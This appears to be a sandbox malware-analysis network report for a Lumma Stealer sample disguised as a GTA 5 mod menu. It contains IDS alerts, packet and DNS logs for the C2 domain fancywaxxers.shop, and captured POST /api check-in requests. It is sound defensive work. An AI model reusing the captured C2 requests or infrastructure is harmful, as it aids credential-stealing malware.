2024-12-30T20:41:03.475678+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49709	104.21.96.1	443	TCP
2024-12-30T20:41:05.142811+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49710	104.21.96.1	443	TCP
2024-12-30T20:41:07.345131+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49710	104.21.96.1	443	TCP
2024-12-30T20:41:08.394830+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49712	104.21.96.1	443	TCP
2024-12-30T20:41:10.624047+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49728	104.21.96.1	443	TCP
2024-12-30T20:41:11.080134+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49728	104.21.96.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 20:40:57.967700958 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:57.967746973 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:57.967817068 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:57.993355989 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:57.993387938 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.501733065 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.501835108 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.508624077 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.508641005 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.508944035 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.557790995 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.561202049 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.561242104 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.561309099 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.976809025 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.976897955 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.977001905 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.978992939 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.979001999 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.979020119 CET	49705	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.979028940 CET	443	49705	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.997263908 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.997298956 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:58.997378111 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.997720957 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:58.997733116 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:59.471405029 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:59.471486092 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:59.473465919 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:59.473478079 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:59.473733902 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:40:59.475121975 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:59.475155115 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:40:59.475191116 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222165108 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222235918 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222268105 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222289085 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.222310066 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222347975 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222352028 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.222357988 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222397089 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222399950 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.222430944 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.222476006 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.222830057 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.226825953 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.226860046 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.226877928 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.226886034 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.226932049 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.330408096 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.330462933 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.330523968 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.330534935 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.330552101 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.330595016 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.331063032 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.331077099 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.331103086 CET	49706	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.331130028 CET	443	49706	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.549524069 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.549556971 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:00.549618006 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.550287962 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:00.550302982 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.036508083 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.036591053 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.085710049 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.085731030 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.086051941 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.129775047 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.148863077 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.148912907 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.736769915 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.736864090 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.737056017 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.737158060 CET	49707	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.737173080 CET	443	49707	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.869299889 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.869340897 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:01.869431019 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.869796038 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:01.869811058 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:02.335150003 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:02.335242987 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:02.336582899 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:02.336591005 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:02.336843967 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:02.338184118 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:02.338344097 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:02.338376999 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:02.338428020 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:02.383338928 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:02.826580048 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:02.826668024 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:02.826730967 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:02.826895952 CET	49708	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:02.826904058 CET	443	49708	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:03.019201040 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.019224882 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:03.019288063 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.019625902 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.019638062 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:03.475584030 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:03.475677967 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.478055000 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.478060961 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:03.478305101 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:03.526578903 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.570506096 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.570672989 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.570694923 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:03.570770025 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:03.570775986 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:04.195075989 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:04.195168018 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:04.195239067 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:04.195441008 CET	49709	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:04.195452929 CET	443	49709	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:04.667855024 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:04.667880058 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:04.667953968 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:04.668363094 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:04.668378115 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:05.142685890 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:05.142811060 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:05.144494057 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:05.144504070 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:05.144769907 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:05.146132946 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:05.146240950 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:05.146248102 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:07.345124960 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:07.345233917 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:07.345290899 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:07.345539093 CET	49710	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:07.345550060 CET	443	49710	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:07.878645897 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:07.878669977 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:07.878736973 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:07.879101992 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:07.879112959 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.394697905 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.394829988 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.396287918 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.396295071 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.396543026 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.397914886 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.398691893 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.398731947 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.399113894 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.399157047 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.399264097 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.399288893 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.399399996 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.399420023 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.399568081 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.399595022 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.399732113 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.399768114 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.408046007 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.408185959 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.408216000 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.408233881 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.408350945 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.408385992 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.409312010 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.409528017 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.409549952 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:08.409565926 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.409598112 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.409641981 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:08.414410114 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.150707006 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.150790930 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.150928020 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.151221991 CET	49712	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.151233912 CET	443	49712	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.167701960 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.167720079 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.167793036 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.168066978 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.168080091 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.623967886 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.624047041 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.625588894 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.625597000 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.625834942 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:10.629113913 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.629153013 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:10.629189014 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080161095 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080209970 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080241919 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080260038 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:11.080272913 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080316067 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:11.080322027 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080429077 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080466032 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:11.080472946 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080852985 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080883026 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080893993 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:11.080904007 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.080943108 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:11.084852934 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.084937096 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.084985018 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:11.183979988 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:11.183993101 CET	443	49728	104.21.96.1	192.168.2.6
Dec 30, 2024 20:41:11.184005976 CET	49728	443	192.168.2.6	104.21.96.1
Dec 30, 2024 20:41:11.184010983 CET	443	49728	104.21.96.1	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 20:40:57.951416969 CET	56022	53	192.168.2.6	1.1.1.1
Dec 30, 2024 20:40:57.962029934 CET	53	56022	1.1.1.1	192.168.2.6
Dec 30, 2024 20:41:16.536076069 CET	53	54710	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 20:40:57.951416969 CET	192.168.2.6	1.1.1.1	0x2ed6	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 20:40:57.962029934 CET	1.1.1.1	192.168.2.6	0x2ed6	No error (0)	fancywaxxers.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 20:40:57.962029934 CET	1.1.1.1	192.168.2.6	0x2ed6	No error (0)	fancywaxxers.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 20:40:57.962029934 CET	1.1.1.1	192.168.2.6	0x2ed6	No error (0)	fancywaxxers.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 20:40:57.962029934 CET	1.1.1.1	192.168.2.6	0x2ed6	No error (0)	fancywaxxers.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 20:40:57.962029934 CET	1.1.1.1	192.168.2.6	0x2ed6	No error (0)	fancywaxxers.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 20:40:57.962029934 CET	1.1.1.1	192.168.2.6	0x2ed6	No error (0)	fancywaxxers.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 20:40:57.962029934 CET	1.1.1.1	192.168.2.6	0x2ed6	No error (0)	fancywaxxers.shop	104.21.32.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49705	104.21.96.1	443	6216	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 19:40:58 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2024-12-30 19:40:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-30 19:40:58 UTC	1133	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 19:40:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0jnpm3jo8u08quuklr5irbskdq; expires=Fri, 25 Apr 2025 13:27:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUDQ9Z1s40Zjl6%2BqDm88eGOGZRsdPwaEF%2B1WY82BOBAM3ltObqmAjdv%2FklJIvpfP4Ash%2BHxrunFA1fn%2FFGAtY4mReSsYBvDaMS7r4G98NL3CgosrwA75NrI5UBUlEUhxCaSBJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa481325bb3c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1653&rtt_var=633&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1710603&cwnd=178&unsent_bytes=0&cid=cc545b2c8fc2a677&ts=489&x=0"
2024-12-30 19:40:58 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-30 19:40:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49706	104.21.96.1	443	6216	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 19:40:59 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 51 Host: fancywaxxers.shop
2024-12-30 19:40:59 UTC	51	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--899083440&j=
2024-12-30 19:41:00 UTC	1128	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 19:41:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cupuc5nkuqm30vkpc0b4le7vtm; expires=Fri, 25 Apr 2025 13:27:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8I8oor%2FjBcE72e5y1qi2WEEKoRQTmflAupqlCzdUiSxVQOSmHMFV15GzWEvAtgwIhC61wI89zTMv4kZG4agI%2F4w4KUDZej8OVhfcw107VrwXbpfyBm8qGQ0P32WFKMbBRVn0qQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4813858d54363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5529&min_rtt=1658&rtt_var=3084&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=952&delivery_rate=1761158&cwnd=238&unsent_bytes=0&cid=3bf828673de3aa33&ts=760&x=0"
2024-12-30 19:41:00 UTC	241	IN	Data Raw: 34 36 36 0d 0a 65 33 79 75 59 75 6f 36 41 68 43 4a 4a 6d 66 5a 72 42 59 54 2b 38 2b 5a 74 71 44 31 6c 54 72 45 65 75 5a 44 6f 74 35 52 32 46 77 41 58 74 68 41 30 41 34 75 4d 76 70 44 52 65 50 59 5a 47 61 65 34 37 76 58 78 4e 65 76 58 4b 55 57 6c 53 61 4f 2f 43 65 31 66 6b 45 61 7a 77 36 5a 58 79 34 79 37 46 35 46 34 2f 64 74 4d 5a 36 68 75 34 79 43 6b 50 39 59 70 52 61 45 49 73 6d 78 49 62 51 2f 45 78 44 4a 43 6f 39 5a 5a 6e 48 6c 53 77 4b 38 79 58 64 35 6c 61 62 30 33 73 33 58 75 52 69 68 41 4d 52 35 67 4a 4d 30 72 44 30 32 48 64 30 4a 79 45 63 75 61 36 74 44 43 66 75 57 4e 48 4b 65 72 66 58 51 78 4a 37 39 55 71 77 65 68 53 66 49 72 6a 69 2b 4e 42 4d 65 79 67 75 46 55 48 4a 38 37 30 77 4a 75 73 4e 33 4d 64 66 74 Data Ascii: 466e3yuYuo6AhCJJmfZrBYT+8+ZtqD1lTrEeuZDot5R2FwAXthA0A4uMvpDRePYZGae47vXxNevXKUWlSaO/Ce1fkEazw6ZXy4y7F5F4/dtMZ6hu4yCkP9YpRaEIsmxIbQ/ExDJCo9ZZnHlSwK8yXd5lab03s3XuRihAMR5gJM0rD02Hd0JyEcua6tDCfuWNHKerfXQxJ79UqwehSfIrji+NBMeyguFUHJ870wJusN3Mdft
2024-12-30 19:41:00 UTC	892	IN	Data Raw: 2f 4d 79 43 7a 37 63 4c 6c 42 75 56 4d 4e 57 78 49 37 78 2b 42 6c 44 56 51 49 39 55 49 43 71 72 54 41 6d 31 79 33 64 2b 6e 71 7a 37 78 73 32 58 39 46 43 75 48 49 34 75 7a 37 4d 39 73 44 6b 52 46 38 73 50 6a 31 42 6d 66 65 67 45 53 2f 76 4a 62 44 48 42 37 64 76 45 77 5a 54 6a 56 62 64 59 6d 32 2f 5a 2f 44 53 32 66 6b 46 65 79 67 36 4a 56 57 42 67 34 30 38 4f 76 74 78 2f 65 4a 53 67 2b 39 6e 49 6d 50 52 59 6f 52 4b 4f 4c 73 71 34 50 72 63 34 47 52 36 4d 54 73 68 66 65 44 4b 7a 42 43 61 2b 33 6e 4e 39 6a 2b 2f 42 6c 4e 33 5a 37 68 69 68 46 4d 52 35 67 4c 51 32 75 54 30 53 45 63 38 49 67 30 70 67 59 4f 31 4a 41 4b 6e 49 63 58 2b 54 72 75 6e 65 7a 4a 48 30 55 61 30 52 67 53 62 45 2f 48 33 36 4f 51 46 65 6c 45 43 70 56 57 74 2b 34 56 4d 46 2b 39 45 36 61 4e 6d Data Ascii: 